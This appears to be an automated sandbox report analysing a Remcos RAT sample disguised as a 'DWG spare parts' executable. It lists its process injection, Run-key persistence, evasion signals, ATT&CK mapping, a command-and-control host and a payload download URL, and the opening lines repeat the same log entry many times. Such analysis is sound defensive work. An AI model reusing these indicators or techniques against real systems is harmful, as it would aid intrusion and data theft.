                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Delayed program exit found
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_02765DE4 Sleep,ExitProcess,2_2_02765DE4
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe TID: 5956Thread sleep count: 32 > 30Jump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe TID: 5956Thread sleep time: -96000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeLast function: Thread delayed
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeAPI coverage: 9.2 %
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02515B48 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02515B48
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeAPI call chain: ExitProcess graph end nodegraph_0-17344
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeAPI call chain: ExitProcess graph end nodegraph_0-19181
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeAPI call chain: ExitProcess graph end nodegraph_12-16144
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeAPI call chain: ExitProcess graph end nodegraph_12-17035

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeMemory written: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeMemory written: C:\Users\Public\Libraries\Uuddcmhn.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeMemory written: C:\Users\Public\Libraries\Uuddcmhn.exe base: 400000 value starts with: 4D5AJump to behavior
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_025248A4 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,SetThreadContext,ResumeThread,0_2_025248A4
                Contains functionality to inject threads in other processes
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02523E60 VirtualAllocEx,GetModuleHandleA,GetProcAddress,GetProcAddress,lstrcpyA,WriteProcessMemory,CreateRemoteThread,CloseHandle,0_2_02523E60
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 12_2_02893E60 VirtualAllocEx,GetModuleHandleA,GetProcAddress,GetProcAddress,WriteProcessMemory,CreateRemoteThread,CloseHandle,12_2_02893E60
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess created: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess created: C:\Users\Public\Libraries\Uuddcmhn.exe C:\Users\Public\Libraries\Uuddcmhn.exeJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess created: C:\Users\Public\Libraries\Uuddcmhn.exe C:\Users\Public\Libraries\Uuddcmhn.exeJump to behavior
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02515D0C
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: GetLocaleInfoA,0_2_0251AA1C
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: GetLocaleInfoA,0_2_0251A9D0
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02515E18
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_02885D0C
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: GetLocaleInfoA,12_2_0288AA1C
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_02885E17
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02519450 GetLocalTime,0_2_02519450
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0251B950 GetVersionExA,0_2_0251B950

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 3432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 5320, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Uuddcmhn.exe PID: 2844, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 3432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 5320, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Uuddcmhn.exe PID: 2844, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation1
                Registry Run Keys / Startup Folder                		311
                Process Injection                		11
                Masquerading                		OS Credential Dumping1
                System Time Discovery                		Remote Services11
                Archive Collected Data                		Exfiltration Over Other Network Medium1
                Encrypted Channel                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Registry Run Keys / Startup Folder                		1
                Virtualization/Sandbox Evasion                		LSASS Memory1
                Security Software Discovery                		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                Non-Standard Port                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)311
                Process Injection                		Security Account Manager1
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                Ingress Tool Transfer                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Deobfuscate/Decode Files or Information                		NTDS1
                Process Discovery                		Distributed Component Object ModelInput CaptureScheduled Transfer2
                Non-Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
                Obfuscated Files or Information                		LSA Secrets1
                Remote System Discovery                		SSHKeyloggingData Transfer Size Limits22
                Application Layer Protocol                		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Software Packing                		Cached Domain Credentials1
                File and Directory Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync14
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                DWG spare parts 455RTMGF Model.exe76%ReversingLabsWin32.Trojan.FormBook
                DWG spare parts 455RTMGF Model.exe55%VirustotalBrowse

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                0.2.DWG spare parts 455RTMGF Model.exe.2510000.1.unpack100%AviraTR/Hijacker.GenDownload File
                1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File

                Domains

                SourceDetectionScannerLabelLink
                geoplugin.net0%VirustotalBrowse
                bestsuccess.ddns.net12%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://geoplugin.net/json.gp0%URL Reputationsafe
                http://geoplugin.net/json.gp/C0%URL Reputationsafe
                bestsuccess.ddns.net100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                geoplugin.net
                		178.237.33.50
                		truefalseunknown
                f0719949.xsph.ru
                		141.8.192.151
                		truefalse
                  		high
                  bestsuccess.ddns.net
                  		79.134.225.115
                  		truetrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://geoplugin.net/json.gpfalse
                  • URL Reputation: safe
                  		unknown
                  http://f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfghfalse
                    		high
                    bestsuccess.ddns.nettrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/json.gp/CDWG spare parts 455RTMGF Model.exe, 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://f0719949.xsph.ru/UuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuUuddcmhn.exe, 0000000C.00000002.315054022.00000000029DE000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      79.134.225.115
                      		bestsuccess.ddns.netSwitzerland
                      		6775FINK-TELECOM-SERVICESCHtrue
                      178.237.33.50
                      		geoplugin.netNetherlands
                      		8455ATOM86-ASATOM86NLfalse
                      141.8.192.151
                      		f0719949.xsph.ruRussian Federation
                      		35278SPRINTHOSTRUfalse

                      General Information

                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:704249
                      Start date and time:2022-09-16 17:07:30 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 9m 11s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:DWG spare parts 455RTMGF Model.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:27
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.expl.evad.winEXE@9/5@5/3
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 97.7% (good quality ratio 85.2%)
                      • Quality average: 76.6%
                      • Quality standard deviation: 34.4%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 58
                      • Number of non-executed functions: 66
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      17:08:29API Interceptor1x Sleep call for process: DWG spare parts 455RTMGF Model.exe modified
                      17:08:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Uuddcmhn C:\Users\Public\Libraries\nhmcdduU.url
                      17:08:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Uuddcmhn C:\Users\Public\Libraries\nhmcdduU.url
                      17:08:48API Interceptor2x Sleep call for process: Uuddcmhn.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      79.134.225.115SecuriteInfo.com.Variant.Jaik.95298.16760.17387.exeGet hashmaliciousBrowse
                        TNT AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                          ach payment 082422.xlsGet hashmaliciousBrowse
                            4qQrF1Cp7w.exeGet hashmaliciousBrowse
                              WY5kzuz4zk.exeGet hashmaliciousBrowse
                                c9NEVq3EZ0.exeGet hashmaliciousBrowse
                                  1FUBGT1LpP.exeGet hashmaliciousBrowse
                                    STATEMENT OF ACCOUNT SEPT-2021-DEC 2021.docGet hashmaliciousBrowse
                                      KYC_UPDATE_DTD_08_11_2021_pdf.jsGet hashmaliciousBrowse
                                        KYC_UPDATE_DTD_08_11_2021_pdf.jsGet hashmaliciousBrowse
                                          Order List.exeGet hashmaliciousBrowse
                                            fu.exeGet hashmaliciousBrowse
                                              Purchase Order- #020521_pdf.exeGet hashmaliciousBrowse
                                                MT TT103-SWIFT_PDF.exeGet hashmaliciousBrowse
                                                  Purchase Order-103667.pdf.exeGet hashmaliciousBrowse
                                                    INQ-TR-04-21-RFQ.exeGet hashmaliciousBrowse
                                                      PO#040221-INQ.exeGet hashmaliciousBrowse
                                                        MrZNctz1uR.exeGet hashmaliciousBrowse
                                                          168900#.exeGet hashmaliciousBrowse
                                                            ORDER-PO29394934.exeGet hashmaliciousBrowse

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              geoplugin.netCOMPRA_MB-220834-1A_Shihlin.exeGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              COMPRA_MB-220834-1A_Shihlin.imgGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              SecuriteInfo.com.Win32.Trojan-gen.31084.exeGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              SecuriteInfo.com.W32.MSIL_Kryptik.HJS.gen.Eldorado.15975.exeGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              Invoice 38129337.exeGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              SecuriteInfo.com.Win32.CrypterX-gen.8546.exeGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              Direct_Deposit_Chase_0015022.xlsGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              NEW INQUIRY DATA.exeGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              56032451742617.PDF.exeGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              New Purchase Order Ref No_00121383.jsGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              kopija bankovnog placanja - 90000 eura.exeGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              SecuriteInfo.com.Win32.TrojanX-gen.4549.exeGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              SecuriteInfo.com.Variant.Lazy.243659.18139.7481.exeGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              SecuriteInfo.com.Variant.Jaik.95298.16760.17387.exeGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              PO.exeGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              SecuriteInfo.com.Trojan.MSIL.Inject.9926.exeGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              vbc.exeGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              b1nWkJ56MP.exeGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              Payment EFT.xlsGet hashmaliciousBrowse
                                                              • 178.237.33.50
                                                              order confirmation reference no. FXEPS6S08102.exeGet hashmaliciousBrowse
                                                              • 178.237.33.50

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              FINK-TELECOM-SERVICESCHFactura.exeGet hashmaliciousBrowse
                                                              • 79.134.225.11
                                                              SecuriteInfo.com.Variant.Lazy.243659.18139.7481.exeGet hashmaliciousBrowse
                                                              • 79.134.225.36
                                                              SecuriteInfo.com.Variant.Jaik.95298.16760.17387.exeGet hashmaliciousBrowse
                                                              • 79.134.225.115
                                                              mlipidpmoe.exeGet hashmaliciousBrowse
                                                              • 79.134.225.22
                                                              Payment EFT.xlsGet hashmaliciousBrowse
                                                              • 79.134.225.8
                                                              COADO 0000236 DTD.exeGet hashmaliciousBrowse
                                                              • 79.134.225.6
                                                              D2 DMF OPEN PARTUPS.exeGet hashmaliciousBrowse
                                                              • 79.134.225.6
                                                              D2 DMF OPEN PARTUPS (2).exeGet hashmaliciousBrowse
                                                              • 79.134.225.27
                                                              ACH remittance.xlsGet hashmaliciousBrowse
                                                              • 79.134.225.8
                                                              ScanCopy378493rh1.scr.exeGet hashmaliciousBrowse
                                                              • 79.134.225.20
                                                              FW Enquiry for URGENT Order.exeGet hashmaliciousBrowse
                                                              • 79.134.225.94
                                                              NEW INQUIRY DATA SHEET.exeGet hashmaliciousBrowse
                                                              • 79.134.225.94
